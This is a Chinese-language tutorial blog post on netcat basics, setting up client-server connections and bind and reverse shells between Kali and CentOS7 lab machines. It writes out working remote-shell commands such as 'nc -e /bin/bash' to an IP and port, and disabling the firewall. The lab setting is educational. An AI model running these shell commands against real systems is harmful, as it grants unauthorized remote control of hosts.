nc的基本操作和反弹shell

一、nc简介

  1. nc 在网络工具中有“瑞士军刀”美誉 ,所做的就是在两台电脑之间建立链接,并返回两个数据流。
  2. 可运行在TCP或者UDP模式,添加参数 ----u 则调整为UDP,默认为TCP
  3. 即可用在windows系统也可在linux系统,也可作用于二者之间,只是对应的命令有些差异。

二、nc常用参数

-l 开启监听
-p 指定一个端口
-v 显示详细输出
-e 指定对应的应用程序
-n nc不要DNS反向查询IP的域名
-z 连接成功后立即关闭连接

三、建立C-S连接

1 环境:
    目的在于实现client输入的内容同样显示在server的终端上

client:CentOS7  192.168.43.186

server:kali   192.168.43.19

(两台主机之间可以互相ping通)
在server端kali虚拟机上开启监听4444端口:

nc -lvvp 4444

在这里插入图片描述

在client端虚拟机上执行如下命令后并随便键入命令(如下图所示):

nc -v  192.168.43.19 4444

在这里插入图片描述
在这里插入图片描述

四、正向反弹shell

环境:

目的在于实现kali的shell反弹到CentOS7的终端上,并可在CentOS7上执行命令操作kali

kali监听端口、选择对应的程序,CentOS7连接kali

CentOS7 192.168.43.186

kali 192.168.43.19

步骤:

在kali上执行:

nc -lvvp 4444 -e /bin/bash

在这里插入图片描述
在CentOS7上执行:

nc 192.168.43.19 4444

nc的基本操作和反弹shell_第1张图片
链接成功
nc的基本操作和反弹shell_第2张图片

五、反向反弹shell

环境:

目的在于CentOS开启监听端口,然后kali自己将shell反弹给CentOS7,而无需CentOS7去连接kali

CentOS7  192.168.43.186

kali   192.168.43.19

步骤:

CentOS7上开启监听5555端口,等待kali连接并反弹shell:

nc -lvp 5555

nc的基本操作和反弹shell_第3张图片
kali连接CentOS7并将shell反弹过去 :

nc -e /bin/bash 192.168.43.186 5555

在这里插入图片描述
连接时报错了 发现是centos7的防火墙没关
在这里插入图片描述

systemctl stop firewalld.service

链接成功

nc的基本操作和反弹shell_第4张图片
在这里插入图片描述

参考文章:https://www.cnblogs.com/Zh1z3ven/p/12976609.html

你可能感兴趣的:(nc的基本操作和反弹shell)